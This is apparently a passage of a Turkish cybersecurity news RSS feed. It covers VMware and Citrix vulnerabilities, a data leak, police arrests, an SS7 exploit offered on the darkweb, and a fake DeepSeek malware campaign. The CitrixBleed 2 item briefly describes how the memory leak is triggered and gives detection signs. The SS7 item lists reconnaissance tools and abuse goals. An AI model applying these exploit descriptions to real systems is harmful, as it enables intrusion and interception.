<p data-start="1805" data-end="2186"><strong data-start="1805" data-end="1838">Yama dışında çözüm bulunmuyor</strong><br data-start="1838" data-end="1841">VMware, bu güvenlik açıkları için herhangi bir geçici çözüm (workaround) sunmadığını açıkladı. Bu nedenle kullanıcıların ve kurumların sistemlerini koruyabilmesi için en son sürümlere güncelleme yapmaları gerekiyor. Özellikle CVE-2025-41239’un VMware Tools for Windows ürününü etkilediği ve farklı bir güncelleme yöntemi gerektirdiği belirtildi.</p>
<p data-start="2188" data-end="2383">Açıkların tamamı, Mayıs 2025’te gerçekleştirilen Pwn2Own Berlin yarışmasında gösterildi. Etkinlikte güvenlik araştırmacıları toplam 29 sıfır gün açığı ortaya koyarak 1.078.750 dolar ödül kazandı.</p>
<p data-start="2390" data-end="2543"><strong data-start="2390" data-end="2402"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>CitrixBleed 2 açığının kamuya duyurulmadan önce hedefli saldırılarda kullanıldığı ortaya çıktı</title>
            <link>https://cumha.com.tr/citrixbleed-2-aciginin-kamuya-duyurulmadan-oence-hedefli-saldirilarda-kullanildigi-ortaya-cikti</link>
            <guid>https://cumha.com.tr/citrixbleed-2-aciginin-kamuya-duyurulmadan-oence-hedefli-saldirilarda-kullanildigi-ortaya-cikti</guid>
            <description><![CDATA[ Citrix NetScaler cihazlarını etkileyen kritik güvenlik açığı CVE-2025-5777’nin, kamuya açık PoC kodları yayınlanmadan yaklaşık iki hafta önce Çin kaynaklı IP adreslerinden gelen saldırılarda kullanıldığı belirlendi. Buna rağmen Citrix, uzun süre aktif istismarları reddetti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a320ac9f27.webp" length="50652" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:26 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CitrixBleed 2 açığı nasıl çalışıyor, hangi tarihler arasında istismar edildi, Citrix neden saldırıları geç açıkladı, hangi sektörler hedef alındı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="430" data-end="669">Citrix NetScaler ürünlerini etkileyen ve "CitrixBleed 2" olarak adlandırılan kritik güvenlik açığı CVE-2025-5777’nin, kamuya açık istismar kodları paylaşılmadan önce siber saldırganlar tarafından hedefli biçimde kullanıldığı tespit edildi.</p>
<p data-start="671" data-end="937">Siber güvenlik firması GreyNoise, 23 Haziran 2025 tarihinde honeypot sistemlerinin bu açığın hedef alındığı saldırıları algıladığını duyurdu. Bu tarih, kamuya açık ilk proof-of-concept (PoC) kodunun yayınlandığı 4 Temmuz’dan yaklaşık iki hafta öncesine denk geliyor.</p>
<p data-start="939" data-end="1417">GreyNoise, 7 Temmuz’da açığı takip etmek için özel bir etiket oluşturduğunu ve bu etiket sayesinde geçmiş verilerdeki saldırı girişimlerinin de görünür hale geldiğini bildirdi. Şirket ayrıca, ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı’na (CISA) 9 Temmuz’da açığın aktif olarak kullanıldığını teyit etti. Bunun üzerine CISA, CVE-2025-5777’yi bilinen istismar edilen güvenlik açıkları (KEV) listesine ekleyerek federal kurumlara bir gün içinde yama uygulanması talimatı verdi.</p>
<p data-start="1419" data-end="1874"><strong data-start="1419" data-end="1442">Citrix sessiz kaldı</strong><br data-start="1442" data-end="1445">GreyNoise tarafından sağlanan istismar kodlarıyla yapılan doğrulamalara göre, saldırılar doğrudan CitrixBleed 2 açığını hedef alıyordu. Ancak Citrix, bu saldırılara ilişkin kamuoyunu zamanında bilgilendirmedi. Güvenlik araştırmacısı Kevin Beaumont’un defalarca yaptığı uyarılara rağmen, şirket 26 Haziran’da yayınladığı güvenlik blog yazısını 11 Temmuz’a kadar sessizce güncelledi ve saldırıların varlığını doğrudan kabul etmedi.</p>
<p data-start="1876" data-end="2177">Citrix, 15 Temmuz’da NetScaler sistemlerinde güvenlik ihlali belirtilerinin nasıl tespit edileceğine ilişkin yeni bir blog gönderisi yayınladı. Buna karşın, bazı araştırmacılar, şirketin istismar göstergelerini (IOC) kendileriyle paylaşıldığı halde açıklamadığını ve şeffaf davranmadığını öne sürüyor.</p>
<p data-start="2179" data-end="2717"><strong data-start="2179" data-end="2206">Açığın teknik detayları</strong><br data-start="2206" data-end="2209">CitrixBleed 2, NetScaler sistemlerinde oturum açma işlemleri sırasında yetersiz giriş doğrulaması nedeniyle ortaya çıkan bir bellek aşımı açığı olarak tanımlanıyor. Saldırganlar, "login=" parametresinde eşittir işareti kullanmadan gönderilen POST istekleriyle cihazdan 127 baytlık bellek verisini dışarı sızdırabiliyor. Horizon3 ve WatchTowr araştırmacıları, bu yöntemin geçerli oturum anahtarlarının ele geçirilmesi için kullanılabildiğini, böylece saldırganların yetkisiz erişim sağlayabileceğini gösterdi.</p>
<p data-start="2719" data-end="3041">Kevin Beaumont, "/doAuthentication.do" yoluna yapılan tekrar eden POST isteklerinin ve "Content-Length: 5" başlığı içeren isteklerin istismar belirtileri olabileceğini belirtti. Ayrıca, kullanıcı adı alanında olağandışı karakterler (örneğin "#") içeren oturum sonlandırmaları da dikkat çekici bulgular arasında yer alıyor.</p>
<p data-start="3043" data-end="3534"><strong data-start="3043" data-end="3081">Citrix’in önerileri yetersiz kaldı</strong><br data-start="3081" data-end="3084">Citrix, istismar edilen oturumların sonlandırılması için ICA ve PCoIP oturumlarının kill komutlarıyla sonlandırılmasını önerdi. Ancak Beaumont, bu yaklaşımın yetersiz olduğunu, SSH, Telnet, RDP ve AAA oturumlarının da ayrı ayrı sonlandırılması gerektiğini ifade etti. Ayrıca sistem yöneticilerine, oturumlar sonlandırılmadan önce olağandışı IP adres değişiklikleri veya yetkisiz kullanıcı girişleri açısından günlük kayıtlarını incelemeleri önerildi.</p>
<p data-start="3536" data-end="3833"><strong data-start="3536" data-end="3564">Tespit ve yayılma durumu</strong><br data-start="3564" data-end="3567">Beaumont’a göre, açık 20 Haziran’dan itibaren kullanılmaya başlandı ve takip eden günlerde yaygınlaştı. Araştırmacı, saldırıların dikkatle seçilmiş hedeflere yönelik olduğunu ve saldırganların NetScaler cihazlarını doğrulamak için profil oluşturduklarını ifade etti.</p>
<p data-start="3835" data-end="4013">Öte yandan, Imperva tarafından yapılan açıklamaya göre, ürünleri 11,5 milyonun üzerinde istismar girişimi tespit etti. Bu saldırıların yaklaşık %40’ı finans sektörünü hedef aldı.</p>
<p data-start="4015" data-end="4240">Citrix, NetScaler ADC ve Gateway için güvenlik yamaları yayınladı ve kullanıcıların desteklenen sürümlere acilen geçmeleri gerektiğini duyurdu. 12.1 ve 13.0 gibi destek dışı sürümler için herhangi bir geçici çözüm bulunmuyor.</p>
<p data-start="4247" data-end="4409"><strong data-start="4247" data-end="4259"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yapay Zeka Destekli IntelSonar ile Görüntü Üzerinden Konum Tespiti Duyuruldu</title>
            <link>https://cumha.com.tr/yapay-zeka-destekli-intelsonar-ile-goeruntu-uzerinden-konum-tespiti-duyuruldu</link>
            <guid>https://cumha.com.tr/yapay-zeka-destekli-intelsonar-ile-goeruntu-uzerinden-konum-tespiti-duyuruldu</guid>
            <description><![CDATA[ Siber güvenlik ve istihbarat alanında çalışan Doğukan Çalışkan, geliştirdikleri IntelSonar sistemiyle yalnızca görüntü verisi kullanılarak coğrafi konum tespiti yapılabildiğini açıkladı. Sistem, Ortadoğu gibi zorlu bölgelerde %92 doğrulukla test edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_68611a9012327.webp" length="29652" type="image/webp"/>
            
            <pubDate>Sun, 29 Jun 2025 13:51:15 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>IntelSonar tam olarak nasıl çalışıyor, sistem hangi alanlarda kullanılabilecek, yapay zeka hangi coğrafi verileri analiz ediyor, açık beta süreci ne zaman başlayacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="473" data-end="846">Siber güvenlik ve açık kaynak istihbarat alanlarında çalışmalar yürüten Doğukan Çalışkan, yeni geliştirdikleri IntelSonar adlı coğrafi konum belirleme sistemini duyurdu. Görüntü işleme ve yapay zeka teknolojileriyle hazırlanan sistem, sadece görsel içerik üzerinden, ek bir veri veya kullanıcı girişi gerektirmeden fotoğrafların çekildiği koordinatları tespit edebiliyor.</p>
<p data-start="848" data-end="1221">Çalışkan'ın açıklamasına göre, IntelSonar özellikle EXIF verisi bulunmayan, bulanık veya referans noktası içermeyen görüntülerde dahi yüksek doğruluk oranı sağlıyor. Sistem, büyük ölçekli coğrafi veri kümeleriyle eğitilmiş derin öğrenme motoru sayesinde, arazi yapısı, bitki örtüsü, kentsel doku, gölge ve ışık yönü gibi unsurları analiz ederek konum tahmini yapabiliyor.</p>
<p data-start="1223" data-end="1557">Yapılan son testlerde IntelSonar, çöl ve kentsel sınır bölgeleri gibi zorlu alanlarda %92'nin üzerinde doğruluk oranına ulaştı. Çalışkan, sistemin askeri ve savunma amaçlı durum tespitinden insani yardım koordinasyonuna, afet haritalandırmadan medya ve çatışma doğrulama süreçlerine kadar birçok alanda kullanılabileceğini belirtti.</p>
<p data-start="1559" data-end="1673">Henüz kapalı test aşamasında olan IntelSonar'ın, önümüzdeki dönemde açık beta sürümünün duyurulması planlanıyor.</p>
<p data-start="1675" data-end="1859"><strong data-start="1675" data-end="1687"></strong></p>
<p><iframe width="504" height="543" src="https://www.linkedin.com/embed/feed/update/urn:li:ugcPost:7345023029405442048?collapsed=1" frameborder="0" allowfullscreen="allowfullscreen" title="Gömülü gönderi"></iframe></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Disneyland Paris'ten 64 GB'lık Dev Veri Sızıntısı: Gizli Planlar ve Mühendislik Belgeleri Ortaya Saçıldı</title>
            <link>https://cumha.com.tr/disneyland-paristen-64-gblik-dev-veri-sizintisi-gizli-planlar-ve-muhendislik-belgeleri-ortaya-sacildi</link>
            <guid>https://cumha.com.tr/disneyland-paristen-64-gblik-dev-veri-sizintisi-gizli-planlar-ve-muhendislik-belgeleri-ortaya-sacildi</guid>
            <description><![CDATA[ Disneyland Paris’e ait mimari çizimler, mühendislik belgeleri ve sahne arkası görüntüler içeren 64 GB’lık gizli veri arşivi internete sızdırıldı. Sızıntı, Türk yazılımcıların geliştirdiği IntelSonar siber tehdit istihbarat platformunda ilk kez fark edildi. Platformun verileri, siber güvenlik dünyasında büyük ses getirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_685599dce8f81.webp" length="39222" type="image/webp"/>
            
            <pubDate>Fri, 20 Jun 2025 20:27:15 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Disneyland veri sızıntısı nasıl gerçekleşti, hangi belgeler sızdırıldı, görüntülerde neler var, endüstriyel casusluk riski nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="441" data-end="858">Fransa’daki Disneyland Paris’e ait son derece gizli mühendislik verileri ve projeler siber saldırı sonucu kamuya sızdırıldı. Toplamda 64 GB’lık veri arşivinde, parkın inşa sürecine dair çok sayıda doküman ve medya dosyası yer alıyor. Sızıntının, Disneyland Paris’in çeşitli tema bölgelerinde çalışan bir taşeron firmanın dijital sistemlerine yapılan izinsiz erişim sonucu gerçekleştiği öğrenildi.</p>
<p data-start="860" data-end="1234"><strong data-start="860" data-end="890">Detaylı planlar sızdırıldı</strong><br data-start="890" data-end="893">Toplamda 39 bin dosyadan oluşan arşiv, Frozen, Pirates of the Caribbean, Phantom Manor ve Big Thunder Mountain gibi popüler alanlara ait detaylı mimari planları, mühendislik hesaplarını, jeolojik raporları ve güvenlik standartlarını içeriyor. Bu belgeler, parkın altyapısal güvenliği ve ticari sırları açısından kritik bilgiler barındırıyor.</p>
<p data-start="1236" data-end="1579"><strong data-start="1236" data-end="1277">Gizli görüntüler de dosyalar arasında</strong><br data-start="1277" data-end="1280">Sızdırılan belgeler arasında 4 binden fazla fotoğraf ve video bulunuyor. Bu görüntüler, Disneyland çalışanlarının gizlilik sözleşmeleriyle korunan alanlarda çekildiği tahmin edilen sahne arkası görüntülerden oluşuyor. Videolar ve fotoğraflar, eğlence parkının yapım aşamalarını gözler önüne seriyor.</p>
<p data-start="1581" data-end="1885"><strong data-start="1581" data-end="1611">Endüstriyel casusluk riski</strong><br data-start="1611" data-end="1614">Uzmanlar, bu tür büyük çaplı sızıntıların yalnızca marka güvenliğini değil, aynı zamanda eğlence parkı sektöründe faaliyet gösteren diğer firmalar için de ciddi bir casusluk fırsatı oluşturduğunu belirtiyor. Disneyland Paris yönetimi ise henüz resmi bir açıklama yapmadı.</p>
<p data-start="1581" data-end="1885"><strong data-start="80" data-end="120">Siber güvenlik uzmanlarının odağında</strong><br data-start="120" data-end="123">Olayla ilgili detaylara <a href="https://intelsonar.com/" target="_blank" rel="noopener"><strong data-start="147" data-end="165">intelsonar </strong></a>platformu üzerinden erişilebiliyor. Yerli yazılımcılar tarafından geliştirilen bu platform, siber tehdit istihbaratı alanında öne çıkan güncel çözümlerden biri olarak dikkat çekiyor. IntelSonar, bu tür sızıntıların erken aşamada tespiti ve analizi konusunda önemli bir araç haline geldi.</p>
<p><strong data-start="1887" data-end="1899"><a href="https://beykozunsesi.com.tr/disneyland-paristen-64-gblik-dev-veri-sizintisi-gizli-planlar-ve-muhendislik-belgeleri-ortaya-sacildi" target="_blank" rel="noopener">Disneyland Paris'ten 64 GB'lık Dev Veri Sızıntısı: Gizli Planlar ve Mühendislik Belgeleri Ortaya Saçıldı</a></strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ali Yerlikaya: 'Siber suçlara karşı 31 ilde düzenlenen operasyonlarda 190 kişi yakalandı'</title>
            <link>https://cumha.com.tr/ali-yerlikaya-siber-suclara-karsi-31-ilde-duzenlenen-operasyonlarda-190-kisi-yakalandi</link>
            <guid>https://cumha.com.tr/ali-yerlikaya-siber-suclara-karsi-31-ilde-duzenlenen-operasyonlarda-190-kisi-yakalandi</guid>
            <description><![CDATA[ İçişleri Bakanı Ali Yerlikaya, son 3 günde 31 ilde düzenlenen siber suç operasyonlarında 190 şüphelinin yakalandığını duyurdu. Şüphelilerin nitelikli dolandırıcılık, yasa dışı bahis, çocuk müstehcenliği ve para aklama gibi suçlara karıştığı belirtildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_68550c73755bf.webp" length="60648" type="image/webp"/>
            
            <pubDate>Fri, 20 Jun 2025 10:26:45 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Siber suç operasyonu hangi illerde yapıldı, kaç kişi gözaltına alındı, şüpheliler hangi suçlardan yakalandı, ele geçirilen malzemeler neler</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="386" data-end="389"><strong data-start="389" data-end="421">31 ilde siber suç operasyonu</strong><br data-start="421" data-end="424">İçişleri Bakanı Ali Yerlikaya, son 3 gün içinde siber suçlara karşı 31 ilde eş zamanlı operasyonlar düzenlendiğini ve bu operasyonlar kapsamında 190 şüphelinin yakalandığını açıkladı.</p>
<p></p>
<p data-start="611" data-end="1130"><strong data-start="611" data-end="666">Dolandırıcılık ve yasa dışı bahis suçları ön planda</strong><br data-start="666" data-end="669">Operasyonlar, nitelikli dolandırıcılık, yasa dışı bahis, çevrimiçi çocuk müstehcenliği ve tacizi gibi suçlara yönelik olarak gerçekleştirildi. Şüphelilerin sosyal medya üzerinden ürün bedeli, dosya masrafı, vergi ücreti, araç kiralama ve kapora gibi bahanelerle vatandaşları dolandırdıkları tespit edildi. Ayrıca, bazı şüphelilerin yasa dışı bahis sitelerinde aktif görev aldığı ve bu sitelerle bağlantılı para transferlerine aracılık ettikleri de belirlendi.</p>
<p data-start="1132" data-end="1542"><strong data-start="1132" data-end="1202">Cumhuriyet Başsavcılıkları ve Emniyet birimleri koordineli çalıştı</strong><br data-start="1202" data-end="1205">Soruşturma süreci, Cumhuriyet Başsavcılıkları ile Emniyet Genel Müdürlüğü Siber Suçlarla Mücadele Daire Başkanlığı'nın koordinasyonunda yürütüldü. Erzurum, Konya, Eskişehir, Sakarya, Gaziantep, Ankara, Mersin, Burdur ve Kocaeli merkezli olmak üzere toplam 31 ilde gerçekleştirilen operasyonlara çok sayıda il emniyet müdürlüğü katıldı.</p>
<p data-start="1544" data-end="1997"><strong data-start="1544" data-end="1578">Suçlamalar ve ele geçirilenler</strong><br data-start="1578" data-end="1581">Yakalanan şüpheliler hakkında 'nitelikli dolandırıcılık', 'yasa dışı bahis', 'suç işlemek amacıyla örgüt kurmak ve üye olmak', 'suçtan elde edilen mal varlığı değerlerini aklamak' ve 'bilişim sistemlerinin kullanılması suretiyle dolandırıcılık' suçlarından işlem başlatıldı. Operasyonlarda çok sayıda dijital materyal, ruhsatsız tabanca ve yaklaşık 15 milyon TL değerinde olduğu belirtilen 10 otomobile el konuldu.</p>
<p data-start="1999" data-end="2187"><strong data-start="1999" data-end="2022">Siber Vatan vurgusu</strong><br data-start="2022" data-end="2025">Yerlikaya, 'Kara Vatan’da olduğu gibi Siber Vatan’da da sanal devriyelerimizle suç ve suçlularla mücadelemize kararlılıkla devam ediyoruz' ifadelerini kullandı.</p>
<p data-start="2189" data-end="2343"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>SS7 açığı karaborsada 5 bin dolara satılıyor: Siber tehdit aktörünün iletişimi adım adım ifşa edildi</title>
            <link>https://cumha.com.tr/ss7-acigi-karaborsada-5-bin-dolara-satiliyor-siber-tehdit-aktoerunun-iletisimi-adim-adim-ifsa-edildi</link>
            <guid>https://cumha.com.tr/ss7-acigi-karaborsada-5-bin-dolara-satiliyor-siber-tehdit-aktoerunun-iletisimi-adim-adim-ifsa-edildi</guid>
            <description><![CDATA[ Sinyalizasyon Sistemi No.7 (SS7) altyapısındaki kritik bir zafiyet, darkweb üzerinden 5 bin dolara satışa çıkarıldı. Exploit geliştiricisi ve tehdit istihbaratı analisti Doğukan Çalışkan’ın alıcı gibi davranarak gerçekleştirdiği teknik analiz, siber suç ağlarındaki yöntemi tüm detaylarıyla ortaya koydu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_684d6ffa71731.webp" length="36734" type="image/webp"/>
            
            <pubDate>Sat, 14 Jun 2025 15:50:33 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>SS7 açığı nasıl tespit ediliyor, darkwebde açıklar nasıl pazarlanıyor, SIP portları neden hedef alınıyor, RCE açığı nasıl kullanılıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="451" data-end="852"><strong data-start="451" data-end="484">SS7 nedir ve neden önemlidir?</strong><br data-start="484" data-end="487">SS7 (Sinyalizasyon Sistemi No.7), dünya genelindeki telefon operatörleri arasında arama başlatma, SMS yönlendirme ve dolaşım bilgisi paylaşımı gibi kritik işlemleri yürüten bir sinyal protokolüdür. Ancak bu sistemde yıllardır süregelen yapısal zafiyetler, özellikle konum takibi, çağrı yönlendirme ve kimlik doğrulama atlatma gibi saldırılara olanak tanımaktadır.</p>
<p data-start="854" data-end="1119"><strong data-start="854" data-end="882">Doğukan Çalışkan kimdir?</strong><br data-start="882" data-end="885">Siber tehdit istihbaratı analisti ve exploit geliştiricisi Doğukan Çalışkan, söz konusu zafiyeti darkweb'de tespit etti. Çalışkan, alıcı kimliğiyle tehdit aktörüyle doğrudan iletişime geçti ve süreci teknik olarak kayıt altına aldı.</p>
<p data-start="1121" data-end="1488"><strong data-start="1121" data-end="1152">Darkweb'de SS7 açığı satışı</strong><br data-start="1152" data-end="1155">Haziran 2025'te darkweb forumlarında yapılan bir paylaşımda, bir tehdit aktörü SS7 açığını 5 bin dolara satışa sundu. Paylaşımda, açığın kullanıldığı bir cihaza ait ekran görüntüleri ve nmap taramaları da yer aldı. İlgili cihazda SIP (5060 portu) servisinin açık olduğu ve SS7 protokolünü işleyen servislerin bulunduğu gözlemlendi.</p>
<p data-start="1490" data-end="1829"><strong data-start="1490" data-end="1531">Alıcı gibi davranılarak temas kuruldu</strong><br data-start="1531" data-end="1534">Çalışkan, tehdit aktörüyle TOX mesajlaşma uygulaması üzerinden temasa geçti. İlk etapta doğrudan açık talep edilmedi; dolandırıcılık olup olmadığını anlamak için kanıt talebinde bulunuldu. Aktör, bir cihaz üzerinde SS7 ile ilgili trafiği gösteren verileri ve cihaz tarama sonuçlarını paylaştı.</p>
<p data-start="1831" data-end="2060">Aktörün mesajlarında dikkat çeken bir ifade vardı: ‘Bu hala çalışan bir RCE’ye (uzaktan kod yürütme açığı) dönüştürülmeli’. Bu, satılan açığın ham haliyle teknik bir işlemci tarafından geliştirilmesi gerektiği anlamına geliyor.</p>
<p data-start="2062" data-end="2382"><strong data-start="2062" data-end="2114">Gösterilen teknik veriler neleri ortaya koyuyor?</strong><br data-start="2114" data-end="2117">Aktör, SIP portu açık olan cihazlar üzerinde çalışan bir Apache sunucusu olduğunu ve PHP tabanlı web uygulamasının hedef alındığını belirtti. Bu sistemlerde, CentOS üzerinde çalışan servislerin zafiyetleri tarandı ve bir RCE potansiyelinin bulunduğu iddia edildi.</p>
<p data-start="2384" data-end="2431">Sunulan veriler arasında şunlar dikkat çekti:</p>
<ul data-start="2432" data-end="2589">
<li data-start="2432" data-end="2460">
<p data-start="2434" data-end="2460">Wappalyzer analiz ekranı</p>
</li>
<li data-start="2461" data-end="2495">
<p data-start="2463" data-end="2495">Nmap ile port tarama sonuçları</p>
</li>
<li data-start="2496" data-end="2539">
<p data-start="2498" data-end="2539">sngrep ve ngrep ile izlenen SS7 trafiği</p>
</li>
<li data-start="2540" data-end="2587">
<p data-start="2542" data-end="2587">Hedef cihazda çalışan servislerin detayları</p>
</li>
</ul>
<p data-start="2590" data-end="2756">Ayrıca aktör, Asterisk PBX için kimlik bilgilerine ulaşılabileceğini de dile getirdi. Bu, çağrı yönlendirme gibi işlemler üzerinde kontrol kurma imkânı doğurabilir.</p>
<p data-start="2758" data-end="3113"><strong data-start="2758" data-end="2803">Satış yöntemi ve emanet sistemi kullanımı</strong><br data-start="2803" data-end="2806">Satıcı, dolandırıcılık şüphesine karşı olarak yalnızca emanet sistemleri üzerinden çalışacağını belirtti. Bu tür sistemlerde, ödeme yapıldıktan sonra ürün doğrulanana kadar para emanet hesabında tutuluyor. Çalışkan, işlem öncesi kanıt talep ettiğinde, tehdit aktörü çeşitli teknik ekran görüntüleri sundu.</p>
<p data-start="3115" data-end="3255"><strong data-start="3115" data-end="3159">SS7 zafiyetlerinin potansiyel tehditleri</strong><br data-start="3159" data-end="3162">SS7 altyapısındaki zafiyetler, kötü niyetli kişiler tarafından şu amaçlarla kullanılabilir:</p>
<ul data-start="3256" data-end="3452">
<li data-start="3256" data-end="3293">
<p data-start="3258" data-end="3293">SMS'lerin yeniden yönlendirilmesi</p>
</li>
<li data-start="3294" data-end="3361">
<p data-start="3296" data-end="3361">Çağrıların gizlice dinlenmesi veya başka bir cihaza aktarılması</p>
</li>
<li data-start="3362" data-end="3403">
<p data-start="3364" data-end="3403">Hedef kişinin anlık konumunun tespiti</p>
</li>
<li data-start="3404" data-end="3452">
<p data-start="3406" data-end="3452">İki faktörlü kimlik doğrulamanın atlatılması</p>
</li>
</ul>
<p data-start="3454" data-end="3687">Ancak burada dikkat çeken en önemli unsur, aktörün bu açığı doğrudan çalışır hale getirmediği, yalnızca gerekli teknik altyapıyı sunduğudur. Bu durum, açığın nihai kullanımının daha gelişmiş gruplara bırakıldığını düşündürmektedir.</p>
<p data-start="3689" data-end="3798"><strong data-start="3689" data-end="3724">Kullanılan teknikler ve araçlar</strong><br data-start="3724" data-end="3727">Çalışkan'ın raporladığı olayda öne çıkan araç ve yöntemler şunlardır:</p>
<ul data-start="3799" data-end="4054">
<li data-start="3799" data-end="3860">
<p data-start="3801" data-end="3860"><strong data-start="3801" data-end="3817">Shodan, Fofa</strong> gibi arama motorları ile hedef belirleme</p>
</li>
<li data-start="3861" data-end="3907">
<p data-start="3863" data-end="3907"><strong data-start="3863" data-end="3871">nmap</strong> ile port tarama ve servis tespiti</p>
</li>
<li data-start="3908" data-end="3959">
<p data-start="3910" data-end="3959"><strong data-start="3910" data-end="3927">sngrep, ngrep</strong> ile SIP ve SS7 trafiği izleme</p>
</li>
<li data-start="3960" data-end="4004">
<p data-start="3962" data-end="4004"><strong data-start="3962" data-end="3976">Wappalyzer</strong> ile yazılım sürüm tespiti</p>
</li>
<li data-start="4005" data-end="4054">
<p data-start="4007" data-end="4054">Web zafiyet analizi ve potansiyel RCE tespiti</p>
</li>
</ul>
<p data-start="4056" data-end="4342"><strong data-start="4056" data-end="4088">Gelişmiş grupların radarında</strong><br data-start="4088" data-end="4091">Tehdit aktörünün de belirttiği gibi, bu tür açıklar genellikle teknik olmayan kullanıcılar için değil; fidye yazılımı grupları, gelişmiş sürekli tehdit (APT) ekipleri ve yasa dışı istihbarat ağları için hazırlanmış altyapıların temelini oluşturuyor.</p>
<p data-start="4344" data-end="4513">SS7 açığı gibi altyapısal zafiyetler, sadece bireysel kullanıcıları değil; kurumsal sistemleri, kamu haberleşmesini ve kritik iletişim altyapılarını da hedef alabilir.</p>
<p data-start="4515" data-end="4665"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Uzmanlardan kritik uyarı: 'DeepSeek' görünümüyle bilgisayarlara gizlice giriyorlar</title>
            <link>https://cumha.com.tr/uzmanlardan-kritik-uyari-deepseek-goerunumuyle-bilgisayarlara-gizlice-giriyorlar</link>
            <guid>https://cumha.com.tr/uzmanlardan-kritik-uyari-deepseek-goerunumuyle-bilgisayarlara-gizlice-giriyorlar</guid>
            <description><![CDATA[ Kaspersky uzmanları, &#039;DeepSeek R1&#039; adıyla yayılan sahte yazılımlar konusunda kullanıcıları uyardı. Sahte web siteleri ve Google reklamları üzerinden yayılan zararlı yazılım, hassas verileri ele geçirmeyi hedefliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202506/image_870x_684c1992e9f4a.webp" length="19280" type="image/webp"/>
            
            <pubDate>Fri, 13 Jun 2025 15:29:19 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>sahte DeepSeek nasıl yayılıyor, BrowserVenom zararlı yazılım nedir, DeepSeek saldırısından nasıl korunulur, zararlı yazılımın hedefinde kimler var</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Kaspersky Global Araştırma ve Analiz Ekibi (GReAT), sahte 'DeepSeek R1 Büyük Dil Modeli' (LLM) uygulaması kullanılarak bilgisayarlara sızan yeni bir kötü amaçlı yazılım kampanyasını ortaya çıkardı.</p>
<p></p>
<p data-start="534" data-end="583"><strong data-start="534" data-end="583">Google Reklamlarıyla Sahte Siteye Yönlendirme</strong></p>
<p data-start="585" data-end="803">Saldırganlar, Google reklamları üzerinden kullanıcıları gerçek DeepSeek platformunu taklit eden sahte sitelere çekiyor. Kullanıcılar "deepseek r1" araması yaptığında, reklam bağlantısı tuzak bir siteye yönlendiriliyor.</p>
<p data-start="805" data-end="855"><strong data-start="805" data-end="855">Sahte Uygulamalar ve Truva Atları Kullanılıyor</strong></p>
<p data-start="857" data-end="1147">Sahte site, Windows işletim sistemi kullanıcılarını hedef alıyor ve kullanıcıya çevrim dışı çalışan Ollama veya LM Studio gibi araçları indirme imkanı sunuyor. İndirme işlemi sırasında CAPTCHA testi kullanılarak kullanıcı kandırılıyor ve ardından kötü amaçlı yazılım bilgisayara yükleniyor.</p>
<p data-start="1149" data-end="1190"><strong data-start="1149" data-end="1190">Windows Defender Koruması Atlatılıyor</strong></p>
<p data-start="1192" data-end="1443">Bu yazılım, Windows Defender'ın korumasını özel algoritmalarla aşarak sisteme yerleşiyor. Ancak yükleme, kullanıcının yönetici haklarına sahip olmasını gerektiriyor. Yönetici hakkı bulunmayan kullanıcıların sistemlerine bu zararlı yazılım bulaşamıyor.</p>
<p data-start="1445" data-end="1483"><strong data-start="1445" data-end="1483">Kullanıcı Verileri Tehlike Altında</strong></p>
<p data-start="1485" data-end="1745">'BrowserVenom' olarak adlandırılan zararlı yazılım, kullanıcının internet tarayıcılarını saldırganlar tarafından kontrol edilen bir proxy sunucusuna yönlendiriyor. Bu yöntemle kullanıcıların hassas tarayıcı verileri çalınıyor ve faaliyetleri sürekli izleniyor.</p>
<p data-start="1747" data-end="1789"><strong data-start="1747" data-end="1789">Uzmanlardan Siber Güvenlik Tavsiyeleri</strong></p>
<p data-start="1791" data-end="1866">Kaspersky uzmanları, kullanıcılara aşağıdaki önlemleri almalarını öneriyor:</p>
<ul data-start="1867" data-end="2120">
<li data-start="1867" data-end="1924">
<p data-start="1869" data-end="1924">İnternet sitesi adreslerinin doğruluğunu kontrol etmek,</p>
</li>
<li data-start="1925" data-end="1998">
<p data-start="1927" data-end="1998">Çevrim dışı yapay zeka araçlarını yalnızca resmi kaynaklardan indirmek,</p>
</li>
<li data-start="1999" data-end="2072">
<p data-start="2001" data-end="2072">Windows’u yönetici ayrıcalıklarına sahip olmayan profillerde kullanmak,</p>
</li>
<li data-start="2073" data-end="2120">
